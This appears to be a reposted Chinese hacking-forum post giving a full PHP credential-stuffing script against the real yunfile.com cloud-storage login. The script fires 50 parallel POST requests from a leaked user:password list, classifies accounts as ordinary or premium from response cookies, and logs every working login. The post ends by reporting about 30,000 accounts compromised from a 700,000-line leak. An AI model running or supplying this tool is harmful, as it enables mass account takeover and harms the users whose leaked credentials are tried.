yunfile网盘多线程破解

文章2013-8-20 13:42 发于t00ls
引用rolling-curl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
<?php
/*
参考代码文章:www.searchtb.com/2012/06/rolling-curl-best-practices.html
*/
error_reporting(0); //不显示错误
ini_set('memory_limit',-1); //内存设置最高

/*

@params $str 输入字符 $type 所需获取编码

*/
function autoiconv($str,$type = "gb2312//ignore"){
$utf32_big_endian_bom = chr(0x00) . chr(0x00) . chr(0xfe) . chr(0xff);
$utf32_little_endian_bom = chr(0xff) . chr(0xfe) . chr(0x00) . chr(0x00);
$utf16_big_endian_bom = chr(0xfe) . chr(0xff);
$utf16_little_endian_bom = chr(0xff) . chr(0xfe);
$utf8_bom = chr(0xef) . chr(0xbb) . chr(0xbf);
$first2 = substr($str, 0, 2);
$first3 = substr($str, 0, 3);
$first4 = substr($str, 0, 3);
if ($first3 == $utf8_bom) $icon = 'utf-8';
elseif ($first4 == $utf32_big_endian_bom) $icon = 'utf-32be';
elseif ($first4 == $utf32_little_endian_bom) $icon = 'utf-32le';
elseif ($first2 == $utf16_big_endian_bom) $icon = 'utf-16be';
elseif ($first2 == $utf16_little_endian_bom) $icon = 'utf-16le';
else { $icon = 'ascii'; return $str;}
return iconv($icon,$type,$str);
}

require("./include/RollingCurl.php"); //载入多线程类

$threads=50; //线程
$timeout=10; //设置超时
$dic_file='./dict/user.txt';//设置加载字典文件
$dict=file($dic_file);//设置字典
$count=count($dict);
echo '[info] 载入字典文件:'.$dic_file.PHP_EOL ;
echo '[info] 加载 '.$count.'行字典'.PHP_EOL ;
echo '[info] 线程:'.$threads.PHP_EOL ;
echo '[info] 超时设定:'.$timeout.PHP_EOL ;
usleep(500);
echo '[info] 程序初始化中...'.PHP_EOL ;

function request_callback($response, $info, $request) {
$p= $request->post_data;
preg_match('/module\=member&action\=validateLogin&username\=(.*?)&password\=(.*?)&remember\=on/',$p,$mm);
$user=$mm[1];
$pass=$mm[2];

//判断登录状态以及用户权限
if(!preg_match('/^Set-Cookie:[\s]+membership=(\d{1}).*?;+/mi', $response,$match)) {

echo '[!] 登录失败 '.'用户名:'.str_pad($user,18," ").'密码:'.str_pad($pass,18," ").PHP_EOL;
}else{
$id=$match[1];
$id= intval(trim($id));
if($id==1){$m='普通会员';}
else if($id==2){$m='高级会员';}
else{ $m='未知情况';}
$str= '[*] 登录成功 '.'用户名:'.str_pad($user,18," ").'密码:'.str_pad($pass,18," ").'权限:'.$m.PHP_EOL;
file_put_contents('./log/logins.txt',$str,FILE_APPEND); //保存扫描结果
echo $str;
}

}


$rc = new RollingCurl("request_callback");

$rc->window_size = $threads; //设置线程
$rc->timeout = $timeout; //设置超时
$method='POST';

$u=array('');
$p=array('');
$url='http://www.yunfile.com/view';

foreach ($dict as $k=> $s){
list($u[$k], $p[$k]) = explode(':',trim(autoiconv($s)));
$username=$u[$k];
$password=$p[$k];
$username;
$post_data='module=member&action=validateLogin&username='.$username.'&password='.$password.'&remember=on';
$request = new RollingCurlRequest($url,$method,$post_data); //CURLOPT_FOLLOWLOCATION=>1 自动跳转 为0 不跳转
$request->options = array(CURLOPT_FOLLOWLOCATION => 0,
CURLOPT_NOBODY => 1,
CURLOPT_HEADER => 1 );

$rc->add($request);

}
$rc->execute();

?>

2019-07-19-04-25-40
2019-07-19-04-25-52
2019-07-19-04-26-04
2019-07-19-04-26-14

加载了某市面上泄露的网盘 700075 行用户密码列表(大小 13mb)成功登录 30163个有效帐号
其中 495个高级会员
耗时 3小时